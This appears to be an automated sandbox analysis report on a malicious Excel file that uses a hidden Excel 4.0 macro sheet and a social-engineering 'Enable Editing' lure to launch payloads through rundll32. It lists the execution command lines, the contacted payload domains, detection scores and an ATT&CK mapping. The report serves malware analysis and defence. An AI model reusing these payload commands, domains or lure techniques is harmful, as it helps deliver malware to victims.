      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
      Source: unknownHTTPS traffic detected: 162.241.2.112:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.179.232.80:443 -> 192.168.2.4:49736 version: TLS 1.2

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 from the yellow bar above RunDLL X 12 13 Once You have Enable Editing, plea T
      Source: Screenshot number: 8Screenshot OCR: Enable Editing I, 11 from the yellow bar above RunDLL (Not Responding) t 12 , It 13 Once Yo
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: statistic-1496367785.xlsInitial sample: CALL
      Source: statistic-1496367785.xlsInitial sample: EXEC
      Found abnormal large hidden Excel 4.0 Macro sheetShow sources
      Source: statistic-1496367785.xlsInitial sample: Sheet size: 8121
      Source: classification engineClassification label: mal80.expl.evad.winXLS@5/7@2/2
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{698BFA13-D49C-4C62-9BE6-E187F6452013} - OProcSessId.datJump to behavior
      Source: statistic-1496367785.xlsOLE indicator, Workbook stream: true
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\flamo.vir,DllRegisterServer
      Source: statistic-1496367785.xlsVirustotal: Detection: 37%
      Source: statistic-1496367785.xlsReversingLabs: Detection: 34%
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\flamo.vir,DllRegisterServer
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\flamo.vir1,DllRegisterServer
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\flamo.vir,DllRegisterServer
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\flamo.vir1,DllRegisterServer
      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
      Source: statistic-1496367785.xlsInitial sample: OLE indicators vbamacros = False
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: rundll32.exe, 0000000F.00000002.920391861.0000000003F10000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: rundll32.exe, 0000000F.00000002.920391861.0000000003F10000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: rundll32.exe, 0000000F.00000002.920391861.0000000003F10000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: rundll32.exe, 0000000F.00000002.920391861.0000000003F10000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Yara detected hidden Macro 4.0 in ExcelShow sources
      Source: Yara matchFile source: statistic-1496367785.xls, type: SAMPLE
      Source: Yara matchFile source: statistic-1496367785.xls, type: SAMPLE

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting2Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting2LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      statistic-1496367785.xls38%VirustotalBrowse
      statistic-1496367785.xls35%ReversingLabsDocument-Excel.Trojan.Woreflint

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      academy.haleemcampus.com1%VirustotalBrowse
      psq.com.mx1%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
